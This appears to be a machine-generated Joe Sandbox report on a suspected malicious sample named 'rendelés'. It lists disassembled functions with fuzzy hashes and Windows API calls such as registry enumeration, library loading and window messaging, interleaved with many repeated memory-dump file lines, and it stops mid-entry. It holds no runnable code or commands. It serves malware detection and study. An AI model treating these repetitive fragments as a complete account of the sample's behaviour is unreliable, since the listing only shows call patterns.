Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D

Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45

Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45

Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05

Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45

Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05

Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05

Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8,004030A8,00422728,00000000,00000000,00000000), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 642719f50e8783f5edcee4fc1fc6b1094146a56febc3a31313945ed9f35360c6
Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
Opcode Fuzzy Hash: 642719f50e8783f5edcee4fc1fc6b1094146a56febc3a31313945ed9f35360c6
Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D

Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsm3A84.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: a1dccb7ad5de8b03bade15b30a27ed1347f7b9d3a9e9f0d0aeacb5a18eef0a99
Instruction ID: fdd171a53236be04b49e80cc8c25aaf428e2db1c32e81cf7e645575326a8d696
Opcode Fuzzy Hash: a1dccb7ad5de8b03bade15b30a27ed1347f7b9d3a9e9f0d0aeacb5a18eef0a99
Instruction Fuzzy Hash: 35017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61D0EBB85E45966D

Function 004064D5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422728,?,('B,00406563,('B,00000000,?,?,Call,?), ref: 004064F9

Strings

('B, xrefs: 004064D5

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Open
String ID: ('B
API String ID: 71445658-2332581011
Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728

Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsm3A84.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: fe5d7100633d4aebe701fe4e2ff17594fa17b57cc0077f8e4dddba4eb7828dca
Instruction ID: eaee0c709954dca67eb2d1c59e66f6ca2c08a593dad46a4828cc6951ae7b5872
Opcode Fuzzy Hash: fe5d7100633d4aebe701fe4e2ff17594fa17b57cc0077f8e4dddba4eb7828dca
Instruction Fuzzy Hash: 5C116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D

Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
RegCloseKey.ADVAPI32(00000000), ref: 0040245F

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 65ff1f8dbaffb273fea002e1581b0fe02a96c3d403949f6d37ec42173edc1899
Instruction ID: 27a137a867c600d8965633a271772258b7302ea9b92edfc7e4bdeed26dcbc29b
Opcode Fuzzy Hash: 65ff1f8dbaffb273fea002e1581b0fe02a96c3d403949f6d37ec42173edc1899
Instruction Fuzzy Hash: 54F06272A04120EBDB11ABB89B4DAAD72A9AF44354F15443BE141B71C0DAFC5D05866E

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 153ab9e6739f7f886f4c830da5bbd0037cfdcbd629ab714a5d97d12cd43f86c5
Instruction ID: 74d914ea4967392a65d1c9fdd8f91c6329c2dde8704c14122971abf6b6e16597
Opcode Fuzzy Hash: 153ab9e6739f7f886f4c830da5bbd0037cfdcbd629ab714a5d97d12cd43f86c5
Instruction Fuzzy Hash: 14E0D872908201CFE705EBA4EE485AD73F0EF40315710097FE401F11D0DBB54C00862D

Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
Part of subcall function 004069C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

